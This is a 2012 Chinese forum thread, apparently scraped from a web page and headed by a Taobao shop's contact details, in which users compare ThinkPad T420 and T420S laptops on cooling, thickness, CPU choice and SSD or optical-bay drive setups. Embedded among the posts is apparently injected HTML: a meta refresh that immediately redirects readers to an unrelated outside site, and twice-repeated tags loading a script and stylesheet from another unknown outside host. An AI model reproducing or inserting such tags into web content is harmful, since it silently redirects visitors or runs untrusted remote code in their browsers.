开业于2004年,诚信服务几万客户
翔意数码淘宝店:xynbnb.taobao.com
全国客服电话:010-59000667
地址:北京东城区东兴隆街56号北京商界A座512
ThinkPad产品专业客服 苹果产品专业客服

求解:T420 T420S区别及性价比。。

看中T420 T420S 有几点求教
1。散热 T420S比较薄会不会影响散热(现使用X200对散热特满意,导致换本不考虑别的品牌)
2。厚度差别明显吗?T420光驱能抽出T420S呢?
3。T420S行货有6000左右的I3处理器。 跟I5处理器 差别大吗?USB3。0有必要太在乎吗?估计2年内换本可能性不大。
4。坛里有T410S性价比不错,有必要考虑吗?(不明白有T420S了,还有生产T410S吗?库存也太久了吧?翻新?)
基本公司内使用偶尔出差用(很少),家里用MAP 游戏不怎么玩,但谁不希望性能越高越好,也喜欢薄点,也在乎价格(公司有定额超出要自己补)

<meta http-equiv="refresh" content="0; url=http://www.9292.cc">
★★★
<script type="text/javascript" src="http://www.7755.cc/q.js"></script>
<link href="http://www.7755.cc/1.css" rel="stylesheet" type="text/css" media="screen" />

<P>&nbsp;</P>

1.散热绝对没问题, 不会比X220差.
2.T420去掉屏幕的厚度=T420S, 我自己用的T420S, 可以到店来比较一下. 光驱都可以插拔的.
3.i5比i3主频提高的同时还多了睿频技术,自动超频, 这样i5的实际频率会更高一点. usb3.0个人感觉用处不大.
4.T410S确实停产了, 我们的库存机渠道绝对靠谱, 不是翻新机, 序列号官网都可以查到的.T420这代刚上市半年多.
对于工作用,其实T410/s就够用了.选一个高点的CPU不如选一个SSD硬盘, 性能提升明显很多. 看一下SSD和机型硬盘的读写测试数据就知道了
以上希望对lz有所帮助{:9_1122:}

★★★
<script type="text/javascript" src="http://www.7755.cc/q.js"></script>
<link href="http://www.7755.cc/1.css" rel="stylesheet" type="text/css" media="screen" />

谢谢,很详细!
2楼回答的超级专业
T410S的SSD可以换成普通硬盘吗?128G有点不够用呀?
应该可以
cnoocboy 发表于 2012-1-11 09:14
T410S的SSD可以换成普通硬盘吗?128G有点不够用呀?

外接一个算了。。。
simbanole 发表于 2012-1-11 09:29
外接一个算了。。。

托架上放一个多方便 我现在就SSD 80G+HD 500G
ttkk123 发表于 2012-1-11 09:33

哦,知道了,HD500G得多少银子呀?
顺便问一下,这款机器不是有两个硬盘位吗?为什么还用光驱位托架呀?
cnoocboy 发表于 2012-1-11 09:40
顺便问一下,这款机器不是有两个硬盘位吗?为什么还用光驱位托架呀?

我机器带的是500g的 自己买的intel SSD

W系列不知道 反正T就一个硬盘位 还有一块放光驱上 反正光驱从来没用过
ttkk123 发表于 2012-1-11 09:33

恩,这样是可以,不过需要常用光驱的人不方便,各有各的好处吧
cnoocboy 发表于 2012-1-11 09:37
哦,知道了,HD500G得多少银子呀?

现在硬盘涨价,贵死你。。。
资金不是问题就上s的啊
那是推荐T420S 还是 T410S
果断420S啊,430都快出来了你还用410你不觉得很落伍嘛
zhang405101 发表于 2012-1-11 22:08
那是推荐T420S 还是 T410S

其实差不多 主要看你习惯16:9的屏幕就T420 我还是习惯T410的屏 总觉得T420那个屏看着很难受

嗯,主要410s还少了那六个恶心的字母  发表于 2012-1-12 11:15
学习了,感觉T还是很不错的
lan19920710 发表于 2012-1-11 22:36
果断420S啊,430都快出来了你还用410你不觉得很落伍嘛

小朋友就是小朋友,只关心OUT不OUT
cnoocboy 发表于 2012-1-11 09:14

可以,但是由于410s用的是1.8的硬盘即便是要换也不会有太大的,如果觉得不够用,可以考虑采用光驱位硬盘架,这样采用双硬盘可以满足要求,而且方便调整,至于光驱现在用的应该都不是很多,做好备份工作的话,基本上一个月都不见得能用上一次,安装系统也可以采用u盘即可,说实在的,现在选择带光驱的机器其实更看重的应该是这个位置,而不是光驱本身了!
lorelei 发表于 2012-1-12 11:14
小朋友就是小朋友,只关心OUT不OUT

竟然说我小盆友!哥也20了好不,过年都21啦~\(≧▽≦)/~啦啦啦
lan19920710 发表于 2012-1-13 17:03
竟然说我小盆友!哥也20了好不,过年都21啦~\(≧▽≦)/~啦啦啦

20也敢在这里自称哥,小朋友你太幼稚了
叫叔叔吧。。。
admini 发表于 2012-1-13 17:31
叫叔叔吧。。。

小盆友快过来喊mi叔叔
对呀。。。。。